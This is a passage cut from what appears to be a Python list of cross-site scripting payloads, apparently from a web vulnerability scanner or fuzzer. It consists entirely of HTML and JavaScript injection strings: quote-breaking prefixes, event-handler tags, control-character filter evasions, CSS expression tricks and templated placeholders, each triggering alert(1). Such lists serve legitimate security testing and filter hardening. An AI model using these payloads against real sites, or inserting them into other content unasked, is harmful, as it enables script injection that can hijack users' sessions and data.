'"/><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', 
'"><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', "'><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />", '"/><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', '"><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', "'><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />", '"/><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', '"><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', "'><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />", '"/><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', '"><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', "'><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />", '<img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', '"><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />', "'><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />", '<img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', '"><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />', "'><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />", '<img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', '"><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />', "'><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />", '<img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', '"><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />', "'><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />", '<img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', '"><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />', "'><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />", '<img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', '"><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />', "'><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />", '<img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', '"><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />', "'><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />", '<img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', 
'"><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />', "'><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />", '<img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', '"><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />', "'><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />", '<script\\x2F>javascript:alert(1)</script>', '"><script\\x2F>javascript:alert(1)</script>', "'><script\\x2F>javascript:alert(1)</script>", '<script\\x20>javascript:alert(1)</script>', '"><script\\x20>javascript:alert(1)</script>', "'><script\\x20>javascript:alert(1)</script>", '<script\\x0D>javascript:alert(1)</script>', '"><script\\x0D>javascript:alert(1)</script>', "'><script\\x0D>javascript:alert(1)</script>", '<script\\x0A>javascript:alert(1)</script>', '"><script\\x0A>javascript:alert(1)</script>', "'><script\\x0A>javascript:alert(1)</script>", '<script\\x0C>javascript:alert(1)</script>', '"><script\\x0C>javascript:alert(1)</script>', "'><script\\x0C>javascript:alert(1)</script>", '<script\\x00>javascript:alert(1)</script>', '"><script\\x00>javascript:alert(1)</script>', "'><script\\x00>javascript:alert(1)</script>", '<script\\x09>javascript:alert(1)</script>', '"><script\\x09>javascript:alert(1)</script>', "'><script\\x09>javascript:alert(1)</script>", '`"\'><img src=xxx:x onerror\\x0B=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x00=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x0C=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x0D=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x20=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x0A=javascript:alert(1)>', '`"\'><img src=xxx:x onerror\\x09=javascript:alert(1)>', '<script>javascript:alert(1)<\\x00/script>', '</ScrIpt><script>javascript:alert(1)<\\x00/script>', '"><script>javascript:alert(1)<\\x00/script>', '</ScrIpt><script>javascript:alert(1)<\\x00/script>', "'><script>javascript:alert(1)<\\x00/script>", '</ScrIpt><script>javascript:alert(1)<\\x00/script>', '<img src=# 
onerror\\x3D"javascript:alert(1)" >', '"><img src=# onerror\\x3D"javascript:alert(1)" >', '\'><img src=# onerror\\x3D"javascript:alert(1)" >', '<video poster=javascript:javascript:alert(1)//', '"><video poster=javascript:javascript:alert(1)//', "'><video poster=javascript:javascript:alert(1)//", '<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X', '"><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X', "'><form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X", '<video><source onerror="javascript:javascript:alert(1)">', '"><video><source onerror="javascript:javascript:alert(1)">', '\'><video><source onerror="javascript:javascript:alert(1)">', '<video onerror="javascript:javascript:alert(1)"><source>', '"><video onerror="javascript:javascript:alert(1)"><source>', '\'><video onerror="javascript:javascript:alert(1)"><source>', '<form><button formaction="javascript:javascript:alert(1)">X', '"><form><button formaction="javascript:javascript:alert(1)">X', '\'><form><button 
formaction="javascript:javascript:alert(1)">X', '<body oninput=javascript:alert(1)><input autofocus>', '"><body oninput=javascript:alert(1)><input autofocus>', "'><body oninput=javascript:alert(1)><input autofocus>", '<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>', '"><math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>', '\'><math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/X.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>', '<frameset onload=javascript:alert(1)>', '"><frameset onload=javascript:alert(1)>', "'><frameset onload=javascript:alert(1)>", '<table background="javascript:javascript:alert(1)">', '"><table background="javascript:javascript:alert(1)">', '\'><table background="javascript:javascript:alert(1)">', '<!--<img src="--><img src=x onerror=javascript:alert(1)//">', '"><!--<img src="--><img src=x onerror=javascript:alert(1)//">', '\'><!--<img src="--><img src=x onerror=javascript:alert(1)//">', '<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">', '"><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">', '\'><comment><img src="</comment><img src=x onerror=javascript:alert(1))//">', '<![><img src="]><img src=x onerror=javascript:alert(1)//">', '"><![><img src="]><img src=x onerror=javascript:alert(1)//">', '\'><![><img src="]><img src=x onerror=javascript:alert(1)//">', '<style><img src="</style><img src=x onerror=javascript:alert(1)//">', '"><style><img src="</style><img src=x onerror=javascript:alert(1)//">', '\'><style><img src="</style><img src=x 
onerror=javascript:alert(1)//">', '<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>', '"><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>', "'><li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>", '<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>', '"><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>', '\'><head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">X</a></body>', '<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>', '"><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>', "'><SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>", '<object data="data:text/html;base64,%(base64)s">', '"><object data="data:text/html;base64,%(base64)s">', '\'><object data="data:text/html;base64,%(base64)s">', '<embed src="data:text/html;base64,%(base64)s">', '"><embed src="data:text/html;base64,%(base64)s">', '\'><embed src="data:text/html;base64,%(base64)s">', '<b <script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>0', '<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '"><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = 
document.getElementById("div1").innerHTML;</script>', '\'><div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '<x \'="foo"><x foo=\'><img src=x onerror=javascript:alert(1)//\'>', '"><x \'="foo"><x foo=\'><img src=x onerror=javascript:alert(1)//\'>', '\'><x \'="foo"><x foo=\'><img src=x onerror=javascript:alert(1)//\'>', '<embed src="javascript:alert(1)">', '"><embed src="javascript:alert(1)">', '\'><embed src="javascript:alert(1)">', '<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x", '<? foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><? foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><? foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<! foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><! 
foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><! foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '</ foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"></ foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'></ foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<? foo="><x foo=\'?><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>\'>">', '"><? 
foo="><x foo=\'?><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>\'>">', '\'><? foo="><x foo=\'?><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>\'>">', '<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<% foo><x foo="%><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><% foo><x foo="%><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><% foo><x foo="%><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '"><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '\'><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '<img \\x00src=x onerror="alert(1)">', '"><img \\x00src=x onerror="alert(1)">', '\'><img \\x00src=x onerror="alert(1)">', '<img \\x47src=x onerror="javascript:alert(1)">', '"><img \\x47src=x onerror="javascript:alert(1)">', '\'><img \\x47src=x onerror="javascript:alert(1)">', '<img \\x11src=x onerror="javascript:alert(1)">', '"><img \\x11src=x onerror="javascript:alert(1)">', '\'><img \\x11src=x onerror="javascript:alert(1)">', '<img \\x12src=x onerror="javascript:alert(1)">', '"><img 
\\x12src=x onerror="javascript:alert(1)">', '\'><img \\x12src=x onerror="javascript:alert(1)">', '<img\\x47src=x onerror="javascript:alert(1)">', '"><img\\x47src=x onerror="javascript:alert(1)">', '\'><img\\x47src=x onerror="javascript:alert(1)">', '<img\\x10src=x onerror="javascript:alert(1)">', '"><img\\x10src=x onerror="javascript:alert(1)">', '\'><img\\x10src=x onerror="javascript:alert(1)">', '<img\\x13src=x onerror="javascript:alert(1)">', '"><img\\x13src=x onerror="javascript:alert(1)">', '\'><img\\x13src=x onerror="javascript:alert(1)">', '<img\\x32src=x onerror="javascript:alert(1)">', '"><img\\x32src=x onerror="javascript:alert(1)">', '\'><img\\x32src=x onerror="javascript:alert(1)">', '<img\\x11src=x onerror="javascript:alert(1)">', '"><img\\x11src=x onerror="javascript:alert(1)">', '\'><img\\x11src=x onerror="javascript:alert(1)">', '<img \\x34src=x onerror="javascript:alert(1)">', '"><img \\x34src=x onerror="javascript:alert(1)">', '\'><img \\x34src=x onerror="javascript:alert(1)">', '<img \\x39src=x onerror="javascript:alert(1)">', '"><img \\x39src=x onerror="javascript:alert(1)">', '\'><img \\x39src=x onerror="javascript:alert(1)">', '<img \\x00src=x onerror="javascript:alert(1)">', '"><img \\x00src=x onerror="javascript:alert(1)">', '\'><img \\x00src=x onerror="javascript:alert(1)">', '<img src\\x09=x onerror="javascript:alert(1)">', '"><img src\\x09=x onerror="javascript:alert(1)">', '\'><img src\\x09=x onerror="javascript:alert(1)">', '<img src\\x10=x onerror="javascript:alert(1)">', '"><img src\\x10=x onerror="javascript:alert(1)">', '\'><img src\\x10=x onerror="javascript:alert(1)">', '<img src\\x13=x onerror="javascript:alert(1)">', '"><img src\\x13=x onerror="javascript:alert(1)">', '\'><img src\\x13=x onerror="javascript:alert(1)">', '<img src\\x32=x onerror="javascript:alert(1)">', '"><img src\\x32=x onerror="javascript:alert(1)">', '\'><img src\\x32=x onerror="javascript:alert(1)">', '<img src\\x12=x onerror="javascript:alert(1)">', '"><img 
src\\x12=x onerror="javascript:alert(1)">', '\'><img src\\x12=x onerror="javascript:alert(1)">', '<img src\\x11=x onerror="javascript:alert(1)">', '"><img src\\x11=x onerror="javascript:alert(1)">', '\'><img src\\x11=x onerror="javascript:alert(1)">', '<img src\\x00=x onerror="javascript:alert(1)">', '"><img src\\x00=x onerror="javascript:alert(1)">', '\'><img src\\x00=x onerror="javascript:alert(1)">', '<img src\\x47=x onerror="javascript:alert(1)">', '"><img src\\x47=x onerror="javascript:alert(1)">', '\'><img src\\x47=x onerror="javascript:alert(1)">', '<img src=x\\x09onerror="javascript:alert(1)">', '"><img src=x\\x09onerror="javascript:alert(1)">', '\'><img src=x\\x09onerror="javascript:alert(1)">', '<img src=x\\x10onerror="javascript:alert(1)">', '"><img src=x\\x10onerror="javascript:alert(1)">', '\'><img src=x\\x10onerror="javascript:alert(1)">', '<img src=x\\x11onerror="javascript:alert(1)">', '"><img src=x\\x11onerror="javascript:alert(1)">', '\'><img src=x\\x11onerror="javascript:alert(1)">', '<img src=x\\x12onerror="javascript:alert(1)">', '"><img src=x\\x12onerror="javascript:alert(1)">', '\'><img src=x\\x12onerror="javascript:alert(1)">', '<img src=x\\x13onerror="javascript:alert(1)">', '"><img src=x\\x13onerror="javascript:alert(1)">', '\'><img src=x\\x13onerror="javascript:alert(1)">', '<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', '"><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', '\'><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', '<img src=x onerror=\\x09"javascript:alert(1)">', '"><img src=x onerror=\\x09"javascript:alert(1)">', '\'><img src=x onerror=\\x09"javascript:alert(1)">', '<img src=x onerror=\\x10"javascript:alert(1)">', '"><img src=x onerror=\\x10"javascript:alert(1)">', '\'><img src=x onerror=\\x10"javascript:alert(1)">', '<img src=x onerror=\\x11"javascript:alert(1)">', '"><img src=x onerror=\\x11"javascript:alert(1)">', '\'><img src=x onerror=\\x11"javascript:alert(1)">', '<img src=x onerror=\\x12"javascript:alert(1)">', '"><img 
src=x onerror=\\x12"javascript:alert(1)">', '\'><img src=x onerror=\\x12"javascript:alert(1)">', '<img src=x onerror=\\x32"javascript:alert(1)">', '"><img src=x onerror=\\x32"javascript:alert(1)">', '\'><img src=x onerror=\\x32"javascript:alert(1)">', '<img src=x onerror=\\x00"javascript:alert(1)">', '"><img src=x onerror=\\x00"javascript:alert(1)">', '\'><img src=x onerror=\\x00"javascript:alert(1)">', '<a href=javascript:javascript:alert(1)>X</a>', '"><a href=javascript:javascript:alert(1)>X</a>', "'><a href=javascript:javascript:alert(1)>X</a>", '<img src="x` `<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>"` `>', '"><img src="x` `<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>"` `>', '\'><img src="x` `<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>"` `>', '<img src onerror /" \'"= alt=javascript:alert(1)//">', '"><img src onerror /" \'"= alt=javascript:alert(1)//">', '\'><img src onerror /" \'"= alt=javascript:alert(1)//">', '<title onpropertychange=javascript:alert(1)></title><title title=>', '"><title onpropertychange=javascript:alert(1)></title><title title=>', "'><title onpropertychange=javascript:alert(1)></title><title title=>", '<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">', '"><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x 
onerror=javascript:alert(1)></a>">', '\'><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">', '<!--[if]><script>javascript:alert(1)</script -->', '"><!--[if]><script>javascript:alert(1)</script -->', "'><!--[if]><script>javascript:alert(1)</script -->", '<!--[if<img src=x onerror=javascript:alert(1)//]> -->', '"><!--[if<img src=x onerror=javascript:alert(1)//]> -->', "'><!--[if<img src=x onerror=javascript:alert(1)//]> -->", '<script src="/\\%(jscript)s"></script>', '"><script src="/\\%(jscript)s"></script>', '\'><script src="/\\%(jscript)s"></script>', '<script src="\\\\%(jscript)s"></script>', '"><script src="\\\\%(jscript)s"></script>', '\'><script src="\\\\%(jscript)s"></script>', '<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', '"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', '\'><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', '<a style="-o-link:\'javascript:javascript:alert(1)\';-o-link-source:current">X', '"><a style="-o-link:\'javascript:javascript:alert(1)\';-o-link-source:current">X', '\'><a style="-o-link:\'javascript:javascript:alert(1)\';-o-link-source:current">X', "<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>", '"><style>p[foo=bar{}*{-o-link:\'javascript:javascript:alert(1)\'}{}*{-o-link-source:current}]{color:red};</style>', 
"'><style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>", '<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d', '"><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d', "'><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d", '<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>', '"><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>', '\'><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>', '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import\'%(css)s?]</style>X', '"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import\'%(css)s?]</style>X', '\'><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import\'%(css)s?]</style>X', '<div style="font-family:\'foo ;color:red;\';">X', '"><div style="font-family:\'foo ;color:red;\';">X', '\'><div style="font-family:\'foo ;color:red;\';">X', '<div style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">X', '<// style=x:expression\\28javascript:alert(1)\\29>', '"><// style=x:expression\\28javascript:alert(1)\\29>', "'><// style=x:expression\\28javascript:alert(1)\\29>", '<style>*{x:??????????(javascript:alert(1))}</style>', '"><style>*{x:??????????(javascript:alert(1))}</style>', "'><style>*{x:??????????(javascript:alert(1))}</style>", '<div style=content:url(%(svg)s)></div>', '"><div style=content:url(%(svg)s)></div>', "'><div style=content:url(%(svg)s)></div>", '<div 
style="list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));">X', '"><div style="list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));">X', '\'><div style="list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));">X', '<div id=d><div style="font-family:\'sans\\27\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '"><div id=d><div style="font-family:\'sans\\27\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '\'><div id=d><div style="font-family:\'sans\\27\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X', '"><div style="background:url(/f#oo/;color:red/*/foo.jpg);">X', '\'><div style="background:url(/f#oo/;color:red/*/foo.jpg);">X', '<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '<div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>', '"><div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>', '\'><div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>', '<x style="background:url(\'x;color:red;/*\')">X</x>', '"><x style="background:url(\'x;color:red;/*\')">X</x>', '\'><x style="background:url(\'x;color:red;/*\')">X</x>', '<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', '"><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', 
'</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', "'><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>", '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', '<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', '</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', '"><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', '</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', "'><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>", '</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', "<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", '"><script>ReferenceError.prototype.__defineGetter__(\'name\', function(){javascript:alert(1)}),x</script>', "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "'><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", '"><script>Object.__noSuchMethod__ = 